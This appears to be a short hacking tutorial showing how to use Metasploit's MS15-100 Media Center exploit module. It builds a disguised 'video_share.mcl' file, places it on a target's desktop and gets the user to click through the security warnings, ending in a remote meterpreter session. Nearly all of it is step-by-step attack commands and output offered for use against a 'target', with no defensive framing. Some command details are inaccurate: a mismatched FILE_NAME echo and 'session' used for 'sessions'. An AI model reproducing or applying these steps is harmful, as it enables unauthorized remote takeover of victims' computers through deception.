In this page, we gonna show you how to create a fake media center share, and by this, we gonna hack into our target
[LETS MAKE IT WORK]
#1) open terminal and type:
assault@hackbook:~$ sudo msfconsole
*Inside msf type 1 by 1*
msf > use exploit /windows/fileformat/ms15_100_mcl_exe
msf exploit (ms15_100_mcl_exe) > info
*And we will get this output*
*Lets continue – Type 1 by 1*
msf exploit (ms15_100_mcl_exe) > set FILENAME video_share.mcl
FILENAME => video_share.mcl
msf exploit (ms15_100_mcl_exe) > set FILE_NAME video_share.exe
FILE_NAME => video_share.mcl
msf exploit (ms15_100_mcl_exe) > set LHOST 192.168.50.15
LHOST => 192.168.50.15
msf exploit (ms15_100_mcl_exe) > exploit
*Let’s copy the file from /root/.msf4/local/video_share.mcl TO our target*
#2) Open another terminal tab, switch to root & type:
root@kali:~# cd ~/.msf4/local/
root@kali:~/.msf4/local# ls
*As you can see, the video_share.mcl is over there. Let’s copy the file to our target machine*
*Now, the mcl file is on the target’s Desktop. Let’s run the file*
*As you can see, we’ve launch the mcl file on the target’s machine, and we’ve got this. – Let’s hit “View Now” on the security warning*
*Let’s hit “Run“*
*Check your msf process, whats going on over there?*
*Type*
msf exploit (ms15_100_mcl_exe) > session
*As you can see, we’ve got a new meterpreter session – Let’s type*
msf exploit (ms15_100_mcl_exe) > session -i 1
[*] Starting interface with 1…
meterpreter >
ENJOY! 🙂
Here is an example by Gamer Forever